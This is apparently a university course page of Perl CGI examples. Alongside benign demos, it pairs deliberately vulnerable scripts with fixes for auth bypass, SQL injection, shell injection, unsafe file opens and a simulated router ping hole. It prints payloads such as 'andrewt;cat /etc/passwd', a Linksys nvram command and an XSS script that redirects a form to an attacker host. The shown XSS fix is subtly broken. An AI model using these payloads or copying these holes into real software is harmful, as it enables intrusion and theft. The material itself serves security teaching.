@colours = qw/AliceBlue AntiqueWhite Aqua Aquamarine Azure Beige Bisque Black BlanchedAlmond Blue BlueViolet Brown BurlyWood CadetBlue Chartreuse Chocolate Coral CornflowerBlue Cornsilk Crimson Cyan DarkBlue DarkCyan DarkGoldenRod DarkGray DarkGreen DarkKhaki DarkMagenta DarkOliveGreen DarkOrange DarkOrchid DarkRed DarkSalmon DarkSeaGreen DarkSlateBlue DarkSlateGray DarkTurquoise DarkViolet DeepPink DeepSkyBlue DimGray DodgerBlue FireBrick FloralWhite ForestGreen Fuchsia Gainsboro GhostWhite Gold GoldenRod Gray Green GreenYellow HoneyDew HotPink IndianRed Indigo Ivory Khaki Lavender LavenderBlush LawnGreen LemonChiffon LightBlue LightCoral LightCyan LightGoldenRodYellow LightGray LightGreen LightPink LightSalmon LightSeaGreen LightSkyBlue LightSlateGray LightSteelBlue LightYellow Lime LimeGreen Linen Magenta Maroon MediumAquaMarine MediumBlue MediumOrchid MediumPurple MediumSeaGreen MediumSlateBlue MediumSpringGreen MediumTurquoise MediumVioletRed MidnightBlue MintCream MistyRose Moccasin NavajoWhite Navy OldLace Olive OliveDrab Orange OrangeRed Orchid PaleGoldenRod PaleGreen PaleTurquoise PaleVioletRed PapayaWhip PeachPuff Peru Pink Plum PowderBlue Purple RebeccaPurple Red RosyBrown RoyalBlue SaddleBrown Salmon SandyBrown SeaGreen SeaShell Sienna Silver SkyBlue SlateBlue SlateGray Snow SpringGreen SteelBlue Tan Teal Thistle Tomato Turquoise Violet Wheat White WhiteSmoke Yellow YellowGreen/;

$index = param('index') || 0;
$color_name  = $colours[$index % @colours];
param('index', $index + 1);

print header, "\n",
	start_html(-bgcolor => $color_name),
	start_form, "\n",
	h1($color_name), "\n",
    hidden('index'), "\n",
    submit("Next colour"), "\n",
    end_form, "\n",
    end_html;

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

# Simple CGI script written by andrewt@cse.unsw.edu.au
# Outputs a form which will rerun the script
# An input field of type hidden is used to pass an integer
# to successive invocations

$max_number_to_guess = 99;

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <title>Guess A Number</title>
</head>
<body>
eof

warningsToBrowser(1);

$number_to_guess = param('number_to_guess');
$guess = param('guess');

$game_over = 0;

if (defined $number_to_guess and defined $guess) {
    $guess =~ s/\D//g;
    $number_to_guess =~ s/\D//g;
    if ($guess == $number_to_guess) {
        print "You guessed right, it was $number_to_guess.\n";
        $game_over = 1;
    } elsif ($guess < $number_to_guess) {
        print "Its higher than $guess.\n";
    } else {
        print "Its lower than $guess.\n";
    }
} else {
    $number_to_guess = 1 + int(rand $max_number_to_guess);
    print "I've  thought of number 0..$max_number_to_guess\n";
}

if ($game_over) {
print <<eof;
    <form method="POST" action="">
        <input type="submit" value="Play Again">
    </form>
eof
} else {
print <<eof;
    <form method="POST" action="">
        <input type="textfield" name="guess">
        <input type="hidden" name="number_to_guess" value="$number_to_guess">
    </form>
eof
}

print <<eof;
</body>
</html>
eof

INTERNAL ERROR MISSING FILE: "code/cgi/myAddressBook.cgi"
INTERNAL ERROR MISSING FILE: "code/cgi/myAddressBook.cgi"

INTERNAL ERROR MISSING FILE: "code/cgi/myAddressBookCookie.cgi"
INTERNAL ERROR MISSING FILE: "code/cgi/myAddressBookCookie.cgi"

INTERNAL ERROR MISSING FILE: "code/cgi/random_image,cgi"
INTERNAL ERROR MISSING FILE: "code/cgi/random_image,cgi"

retrieved value stored for x in cookie if there is one increment and set the cookie to this value

$x = 0;
if (defined $ENV{HTTP_COOKIE} && $ENV{HTTP_COOKIE} =~ /\bx=(\d+)/) {
    $x = $1 + 1;
}
print "Content-type: text/html
Set-Cookie: x=$x;

<html><head></head><body>
x=$x
</body></html>";

retrieves value stored for x in cookie if there is one increment and set the cookie to this value

use CGI qw/:all/;
use CGI::Cookie;

%cookies = fetch CGI::Cookie;
$x = 0;
$x = $cookies{'x'}->value if $cookies{'x'};
$x++;
print header(-cookie=>"x=$x"), start_html('Cookie Example'), "x=$x", end_html;


INTERNAL ERROR MISSING FILE: "code/cgi/insecure_shell.cgi"
INTERNAL ERROR MISSING FILE: "code/cgi/insecure_shell.cgi"

INTERNAL ERROR MISSING FILE: "code/cgi/insecure_shell.fixed.cgi"
INTERNAL ERROR MISSING FILE: "code/cgi/insecure_shell.fixed.cgi"

INTERNAL ERROR MISSING FILE: "code/cgi/insecure_mail.cgi"
INTERNAL ERROR MISSING FILE: "code/cgi/insecure_mail.cgi"

INTERNAL ERROR MISSING FILE: "code/cgi/insecure_mail.fixed.cgi"
INTERNAL ERROR MISSING FILE: "code/cgi/insecure_mail.fixed.cgi"

INTERNAL ERROR MISSING FILE: "code/cgi/insecure_mail.fixed.1.cgi"
INTERNAL ERROR MISSING FILE: "code/cgi/insecure_mail.fixed.1.cgi"

INTERNAL ERROR MISSING FILE: "code/cgi/insecure_open.cgi"
INTERNAL ERROR MISSING FILE: "code/cgi/insecure_open.cgi"

INTERNAL ERROR MISSING FILE: "code/cgi/insecure_open.fixed.cgi"
INTERNAL ERROR MISSING FILE: "code/cgi/insecure_open.fixed.cgi"

to demonstrate a possible CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script</title>
</head>
<body>
eof

warningsToBrowser(1);

# insecure: user may set this parameter directly
# For example using using this URL:
# http://www.cse.unsw.edu.au/code/cgi/admin_script.cgi?password_checked=1&student_number=5555555&new_mark=100

if (param('password_checked')) {
    if (param('student_number') && param('new_mark')) {
        mark_changed_screen();
    } else {
        change_mark_screen()
    }
} elsif (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
        param('password_checked', 1);
        change_mark_screen();
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}

exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n<p>\n";
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

sub change_mark_screen {
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="password_checked" value="1">
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


to demonstrate fixing a CGI security hole note login&password are passed as hidden fields by admin screen and authenticated again before changing a mark

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);


print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script - fixed</title>
</head>
<body>
eof
warningsToBrowser(1);

if (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
        if (param('student_number') && param('new_mark')) {
            mark_changed_screen();
        } else {
            change_mark_screen()
        }
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}
exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n<p>\n";
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

sub change_mark_screen {
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="login" value="1">
<input type="hidden" name="password" value="1">
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


to demonstrate a possible CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script</title>
</head>
<body>
eof

warningsToBrowser(1);

# insecure: user may set this parameter directly
# For example using using this URL:
# http://www.cse.unsw.edu.au/code/cgi/admin_script.cgi?password_checked=1&student_number=5555555&new_mark=100

$token = param('token');
if (defined $token) {
	$token =~ s/[^\w\-]//g;
	$token_file = "issued_tokens/$token";
	# check we've issued token in the last day
	if (length($token) > 30 && -e $token_file && -M $token_file < 1) {
	    if (param('student_number') && param('new_mark')) {
	        mark_changed_screen();
	    } else {
	        change_mark_screen()
	    }
	} else {
	    login_screen();
	}
} elsif (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
    	# get a unique 64-bit UUID
		$token = `uuidgen`;
		chomp $token;
		$token_file = "issued_tokens/$token";
		open F, '>', "$token_file";
		close F;
        param('token', $token);
        change_mark_screen();
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}

exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n", p;
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

sub change_mark_screen {
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="token" value="$token">
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


INTERNAL ERROR MISSING FILE: "code/cgi/insecure_linksys.cgi"
INTERNAL ERROR MISSING FILE: "code/cgi/insecure_linksys.cgi"

INTERNAL ERROR MISSING FILE: "code/cgi/insecure_linksys.fixed.cgi"
INTERNAL ERROR MISSING FILE: "code/cgi/insecure_linksys.fixed.cgi"

to demonstrate SQL injection

This scripts expects parameters such as: user=andrewt password=secret

it can be fooled by including SQL code in the password parameter for example: user=andrewt password=' or '42'='42

These command generate a suitable sqlite database for the script echo "create table passwd(user TEXT, password TEXT);"|sqlite3 user.db echo "insert into passwd(user,password) values('andrewt','secret');"|sqlite3 user.db

use CGI qw/:all/;
use DBI;

print header, start_html('SQL Injection');
if (!defined param('user')) {
    print start_form, 'User: ', textfield('user'),p, 'Password: ', textfield('password'),p,submit,end_form;
    print p,"Should only be to authenticate with user <font color=red>andrewt</font>, password <font color=red>correct horse battery staple</font>\n";
    print p,"But try any user with password <font color=red>' or '42'='42</font>\n",p,end_html;
    exit(0);
}

$dbh = DBI->connect( "dbi:SQLite:user.db" ) || die;
$user = param('user');
$password = param('password');
$res = $dbh->selectall_arrayref("SELECT * from passwd where user='$user' and password='$password'");
if (@$res) {
    print "Authenticated\n";
} else {
    print "Wrong password\n";
}

print "<p><tt><small>sql query = SELECT * from passwd where user='$user' and password='$password'\n",end_html;

with SQL injection security hole fixed

This scripts expects parameters such as: user=andrewt password=secret

it can be fooled by including SQL code in the password parameter for example: user=andrewt password=or 't'='t

These command generate a suitable sqlite database for the script echo "create table passwd(user TEXT, password TEXT);"|sqlite3 user.db echo "insert into passwd(user,password) values('andrewt','secret');"|sqlite3 user.db

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);
use DBI;

print header, start_html('SQL Injection - Avoided');
warningsToBrowser(1);

if (!defined param('user')) {
    print start_form, 'User: ', textfield('user'),p, 'Password: ', textfield('password'),p,submit,end_form;
    print p,"Should only be to authenticate with user <font color=red>andrewt</font>, password <font color=red>secret</font>\n";
    print p,"Adding SQL will not help, e.g. try: <font color=red>' or '42'='42</font>\n",p,end_html;
    exit(0);
}

$dbh = DBI->connect( "dbi:SQLite:user.db" ) || die;

$user = param('user');
$user = substr $user, 0, 64;          # limit user name to 64 characters
$user =~ s/\W+//g;                    # remove all but expected characters
$user = $dbh->quote($user);           # should be unnecesssary
$password = param('password');
$password = substr $password, 0, 64;  # limit password to 64 characters
$password = $dbh->quote($password);   # quote SQL special characters

$res = $dbh->selectall_arrayref("SELECT * from passwd where user=$user and password=$password");
if (@$res) {
    print "Authenticated\n";
} else {
    print "Wrong password\n";
}

print "<p><tt><small>sql query = SELECT * from passwd where user=$user and password=$password\n",end_html;

INTERNAL ERROR MISSING FILE: "code/cgi/http://xkcd.com/327/"
INTERNAL ERROR MISSING FILE: "code/cgi/http://xkcd.com/327/"

INTERNAL ERROR MISSING FILE: "code/cgi/xss.cgi"
INTERNAL ERROR MISSING FILE: "code/cgi/xss.cgi"

INTERNAL ERROR MISSING FILE: "code/cgi/xss.fixed.cgi"
INTERNAL ERROR MISSING FILE: "code/cgi/xss.fixed.cgi"

<!DOCTYPE html>
<html lang="en">
<head>
<title>Command</title>
</head>
<body>
<input type=text id="x" onkeyup="sum();"> +
<input type=text id="y" onkeyup="sum();"> =
<input type=text id="sum" readonly="readonly">
<script type="text/javascript">
function sum() {
    var x = parseInt(document.getElementById('x').value) || 0;
    var y = parseInt(document.getElementById('y').value) || 0;
    document.getElementById('sum').value = x + y;
}
</script>
</body>
</html>

use CGI qw/:all -debug/;

$checker = <<xxJSxx
function check(form) {
    if (form.mystring.value.length > 6) {
        alert("String too long")
        return false;
    }
    return true;
}
xxJSxx
;

$mystring = param("mystring");

print header, start_html(-script=>$checker),
    h3("Type a string"),
    start_form(-onsubmit=>"return check(this);"),
    textfield("mystring","",10,8),
    submit("Send"),
    end_form;

if (defined $mystring) {
    $nc = length($mystring);
    print p("String: '$mystring' has $nc chars");
}
print end_html;

<html>
<head>
<title>Command</title>
</head>
<body>
<button id="match">Match</button> regular expression <input type=text id=regex>
<br>
against string <input type=text id=string>
<div id="show"></div>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js"></script>
<script type="text/javascript">
$(document).ready(
    function() {
        $("#match").click(
            function() {
                $.get(
                    "match.cgi",
                    {string:$("#string").val(), regex:$("#regex").val()},
                    function(data) {
                        $("#show").html(data)
                    }
                )
            }
        )
    }
)
</script>
</body>
</html>

See match.html

use CGI qw/:all/;
print header;
if (param('string') =~ param('regex')) {
    print b('Match succeeded, this substring matched: ');
    print tt(escapeHTML($&));
} else {
    print b('Match failed');
}

INTERNAL ERROR MISSING FILE: "code/cgi/"
INTERNAL ERROR MISSING FILE: "code/cgi/"

Pick a random image from a directory overlay the image with the filename using ImageMagick

$directory = "./images";
foreach $file (glob "$directory/*.jpg") {
    next if !-r $file;
    push @files, $file;
}

$random_file = $files[rand @files];
$name = $random_file;
$name =~ s/.jpg$//;
$name =~ s/.*\///;
$name =~ s/[\-_]/ /g;
$name =~ s/[^\w\s]//g;
$convert_options = "-gravity south -pointsize 72 -stroke '#0004' -strokewidth 2 -annotate 0 '$name' -stroke none -fill white -annotate 0 '$name'";
print "Content-type: image/jpeg\n\n";
system "convert '$random_file' $convert_options -"


to demonstrate a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Shell');
warningsToBrowser(1);

$login = param("login");
if (!defined $login) {
	print start_form, 'Enter login: ', textfield('login'), end_form, end_html;
	exit 0;
}

# insecure $login may contain shell meta-characters
# e.g it might be "andrewt;cat /etc/passwd"

$user_id =`/usr/bin/id $login`;
print "The user id of $login is $user_id\n", end_html;

to demonstrate a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);


print header, start_html('Insecure Shell Fixed');
warningsToBrowser(1);

$login = param("login");
if (!defined $login) {
	print start_form, 'Enter login: ', textfield('login'), end_form, end_html;
	exit 0;
}

$login = substr($login, 0, 32); # limit login to 32 characters
$login =~ s/[^\w\-]//g;         # removed all but expected characters
$user_id =`/usr/bin/id $login`;
print "The user id of $login is '$user_id'\n", end_html;

to demonstrate a possible CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Mail');
warningsToBrowser(1);

$login = param("login");
if (!defined $login) {
	print start_form, 'Enter login: ', textfield('login'), end_form, end_html;
	exit 0;
}

# insecure $login may contain shell meta-characters
# e.g it might be "andrewt;cat /etc/passwd"

system "echo hello|mutt -e 'set copy=no' -s 'web message' $login";

print "Mail sent to $login\n", end_html;

with CGI security hole probably fixed

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Mail Fixed');
warningsToBrowser(1);

$address = param("address");
if (!defined $address) {
	print start_form, 'Enter e-mail address: ', textfield('address'), end_form, end_html;
	exit 0;
}

# This seems to avoid problems with Shell special characters
# but it is safer to run mail directly rather via the shell
$address = substr($address, 0, 256);
# Remove all but characters legal in e-mail addresses
$address =~ s/[^\w\.\@\-\!\#\$\%\&\'\*\+\-\/\=\?\^_\`\{\|\}\~]//g;
# This stops quotes causing a shell syntax error 
$address =~ s/'/\\'/g;
system "echo hello|mutt -e 'set copy=no' -s  'web message' -- '$address'";
print "Mail sent to $address\n", end_html;

to simulate the security hole present is some linksys routers

This security hole was exploited to allow the routers operating system to be user upgraded by entering a command like this: ;cp${IFS}*/*/nvram${IFS}/tmp/n ;*/n${IFS}set${IFS}boot_wait=on ;*/n${IFS}commit ;*/n${IFS}show>tmp/ping.log

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);



print header, start_html('Simulation of Linksys Ping Test Hole');
warningsToBrowser(1);

$host = param("host");
if (!defined $host) {
	print start_form, 'Enter host to ping: ', textfield('host'), end_form;
} else {
	print "<pre>";
	system "ping -c 1 $host";
	print "</pre>";
}
print end_html;

to simulate the security hole present is some linksys routers with security hole removed

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Simulation of Linksys Ping Test Hole');
warningsToBrowser(1);

$host = param("host");
if (!defined $host) {
	print start_form, 'Enter host to ping: ', textfield('host'), end_form;
} else {
	$host = substr $host, 0, 256;          # limit user name to 256 characters
	$host =~ s/[^\w\-\.]//g;               # remove all permitted characters
	print "<pre>";
	system "ping -c 1 $host";
	print "</pre>";
}
print end_html;

to demonstrate a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Open');
warningsToBrowser(1);

$filename = param("filename");
if (!defined $filename) {
	print start_form, 'Enter filename: ', textfield('filename'), end_form, end_html;
	exit 0;
}

chdir "/tmp";

# insecure $filename might contain |, > or < characters
# $filename also contain / or ..
open F, $filename or die "Can not open $filename: $!";
print "The contents of $filename are:<pre>";
print <F>;
print "</pre>", end_html;

to demonstrate removal of a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Insecure Open Fixed');
warningsToBrowser(1);

$filename = param("filename");
if (!defined $filename) {
	print start_form, 'Enter filename: ', textfield('filename'), end_form, end_html;
	exit 0;
}

chdir "/tmp";

$filename = substr($filename, 0, 4096);
$filename =~ s/\///;
$filename =~ s/^\.*$//;
open F, '<', $filename or die "Can not open $filename: $!";
print "The contents of $filename are:<pre>";
print <F>;
print "</pre>", end_html;

to demonstrate a possible CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script</title>
</head>
<body>
eof

warningsToBrowser(1);

# insecure: user may set this parameter directly
# For example using using this URL:
# http://www.cse.unsw.edu.au/code/cgi/admin_script.cgi?password_checked=1&student_number=5555555&new_mark=100

if (param('password_checked')) {
    if (param('student_number') && param('new_mark')) {
        mark_changed_screen();
    } else {
        change_mark_screen()
    }
} elsif (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
        param('password_checked', 1);
        change_mark_screen();
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}

exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n<p>\n";
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

sub change_mark_screen {
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="password_checked" value="1">
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


to demonstrate fixing a CGI security hole note login&password are passed as hidden fields by admin screen and authenticated again before changing a mark

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);


print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Insecure 2041 admin script - fixed</title>
</head>
<body>
eof
warningsToBrowser(1);

if (defined param('login') && defined param('password')) {
    if (authenticate_password()) {
        if (param('student_number') && param('new_mark')) {
            mark_changed_screen();
        } else {
            change_mark_screen()
        }
    } else {
        wrong_password_screen();
    }
} else {
    login_screen();
}
exit 0;

sub login_screen {
    print <<eof
<form action="">
Enter login: <input type="textfield" name="login">
<br>
Enter password: <input type="password" name="password">
<br>
<input type="submit" value="Login">
</form>
</body>
</html>  
eof
}

sub wrong_password_screen {
    print "Login or password incorrect.\n<p>\n";
    login_screen();
}


sub authenticate_password {
    my $login = param('login');
    my $password = param('password');
    return $login && $password && $login eq "andrewt" && $password eq "secret";
}

sub change_mark_screen {
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="login" value="1">
<input type="hidden" name="password" value="1">
</form>
</body>
</html>  
eof
}

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


with SQL injection security hole fixed

This scripts expects parameters such as: user=andrewt password=secret

it can be fooled by including SQL code in the password parameter for example: user=andrewt password=or 't'='t

These command generate a suitable sqlite database for the script echo "create table passwd(user TEXT, password TEXT);"|sqlite3 user.db echo "insert into passwd(user,password) values('andrewt','secret');"|sqlite3 user.db

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);
use DBI;

print header, start_html('SQL Injection - Avoided');
warningsToBrowser(1);

if (!defined param('user')) {
    print start_form, 'User: ', textfield('user'),p, 'Password: ', textfield('password'),p,submit,end_form;
    print p,"Should only be to authenticate with user <font color=red>andrewt</font>, password <font color=red>secret</font>\n";
    print p,"Adding SQL will not help, e.g. try: <font color=red>' or '42'='42</font>\n",p,end_html;
    exit(0);
}

$dbh = DBI->connect( "dbi:SQLite:user.db" ) || die;

$user = param('user');
$user = substr $user, 0, 64;          # limit user name to 64 characters
$user =~ s/\W+//g;                    # remove all but expected characters
$user = $dbh->quote($user);           # should be unnecesssary
$password = param('password');
$password = substr $password, 0, 64;  # limit password to 64 characters
$password = $dbh->quote($password);   # quote SQL special characters

$res = $dbh->selectall_arrayref("SELECT * from passwd where user=$user and password=$password");
if (@$res) {
    print "Authenticated\n";
} else {
    print "Wrong password\n";
}

print "<p><tt><small>sql query = SELECT * from passwd where user=$user and password=$password\n",end_html;

to exhibit a cross site scripting attack

The code below allows a user to upload a string describing their status. This string is then included in a web page viewed by other users which is a security hole because it allows cross-site scripting attack .

A use can upload HTML and then it will be embedded in a web page viewed by other users.

This is a security hole, because they can for example, upload javascript which changes the page, for example, redirecting URLs

For example if they could upload this Javascript: <script>window.onload = function () {document.getElementsByTagName("form")[0].action = "http://hackers.r.us/hack.cgi";};</script>

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('My Status'), h2('Status Summary');
warningsToBrowser(1);

$data_directory = "./status_data/";
-d $data_directory or mkdir $data_directory or die "Cannot create $data_directory: $!\n";

if (param('new_status')) {
    my $user = param('user');
    
    # sanitize supplied user name
    $user =~ s/\W//;
    $user =~ substr($user, 0, 128);
    
    # retrieve correct password from file "status_passwords"
    my $correct_password;
    open P, '<', "status_passwords" or die;
    while (<P>) {
        last if ($correct_password) = /$user:(.*)$/;
    }
    
    # if supplied password is correct update users's status 
    
    if (defined $correct_password && $correct_password eq param('password')) {
        open S, '>', "$data_directory/$user" or die;
        print S param('new_status');
        close S;
        print "Status for $user updated\n",p;
    } else {
        print "Error: could not update status for $user\n",p;
    }
}



# display the status of all users
foreach $status_file (glob "$data_directory/*") {
    my ($user) = $status_file =~ /\/([^\/]*)$/;
    open F, '<', $status_file or next;
    my $user_status = join '', <F>;
    print "<li> $user: $user_status\n";
}

# allow users to update their status

print   hr,
        start_form,
        p, 'Username: ', textfield('user'), 
        p, 'Password: ', textfield('password'),
        p, 'New status: ', textfield('new_status'),
        p, submit('Update status'),
        end_form,
        end_html;
exit 0;


to exhibit avoiding a cross site scripting attack

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('My Status'), h2('Status Summary');
warningsToBrowser(1);

$data_directory = "./status_data/";
-d $data_directory or mkdir $data_directory or die "Cannot create $data_directory: $!\n";

if (param('new_status')) {
    my $user = param('user');
    
    # sanitize supplied user name
    $user =~ s/\W//;
    $user =~ substr($user, 0, 128);
    
    # retrieve correct password from file "status_passwords"
    my $correct_password;
    open P, '<', "status_passwords" or die;
    while (<P>) {
        last if ($correct_password) = /$user:(.*)$/;
    }
    
    # if supplied password is correct update users's status 
    
    if (defined $correct_password && $correct_password eq param('password')) {
        open S, '>', "$data_directory/$user" or die;
        print S param('new_status');
        close S;
        print "Status for $user updated\n",p;
    } else {
        print "Error: could not update status for $user\n",p;
    }
}



# display the status of all users
foreach $status_file (glob "$data_directory/*") {
    my ($user) = $status_file =~ /\/([^\/]*)$/;
    open F, '<', $status_file or next;
    my $user_status = join '', <F>;
    
    # prevent an XSS attack by stopping HTML tags being included
    # this is not sufficient in other contexts
    # https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
    $user_status =~ s/</&lt;/g
    $user_status =~ s/>/&gt;/g
    $user_status =~ s/&/&amp;/g
    print "<li> $user: $user_status\n";
}

# allow users to update their status

print   hr,
        start_form,
        p, 'Username: ', textfield('user'), 
        p, 'Password: ', textfield('password'),
        p, 'New status: ', textfield('new_status'),
        p, submit('Update status'),
        end_form,
        end_html;
exit 0;


with CGI security hole fixed

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('A Simple Example');
warningsToBrowser(1);

$address = param("address");
if (!defined $address) {
	print start_form, 'Enter e-mail address: ', textfield('address'), end_form, end_html;
	exit 0;
}

# Remove all but characters legal in e-mail addresses
# and reduce to maximum allowed length
$address = substr($address, 0, 256);
$address =~ s/[^\w\.\@\-\!\#\$\%\&\'\*\+\-\/\=\?\^_\`\{\|\}\~]//g;

open F, '|-', 'mutt', '-e', 'set copy=no', '-s', 'web message', '--', $address or die "Can not run mail";
print F "Hello\n";
close F;
print "Mail sent to $address\n", end_html;

COMP[29]041 Example CGI scripts

Git:lecture slideslecture notes

Exam:lecture slideslecture notes



COMP[29]041 All Links


All Tutorial Questions: 02 03 04 05 06 07 08 09 10 11 12 13
All Tutorial Sample Answers: 02 03 04 05 06 07 08 09 10 11 12 13
All Laboratory Exercises: 02 03 04 05 06 07 08 09 10 11 12 13
All Laboratory Sample Solutions: 02 03 04 05 06 07 08 09 10 11 13
All Weekly Test Questions: 05 06 07 08 09 10 11 13
All Weekly Test Sample Solutions: 05 06 07 08 09 10 11 13
Intro slides notes     Stack Overflow - Q&A for programmers
Filters slides notes Command Line Examples     regex1011: online regex tester
Shell slides notes     Shell commands for power users.
Perl Intro slides notes     perl.org documentation, FAQs & tutorialsa quick referencecourse lecture notesCSE CPAN mirror
Perl Arrays slides notes
Perl Regex slides notes     regex summary
Perl Functions slides notes
Python slides notes     Evan's: Python slidesAdvanced Python slidesPort Forwarding TutorialFlask Tutorial Video     python.org tutorialPerl-->PythonrecipesCrash into PythonGoogle tutorialQuick Guide The hard way
Web slides notes
CGI slides notes Cgi Examples    
CGI.pm tutorial
Git slides notes
Exam slides notes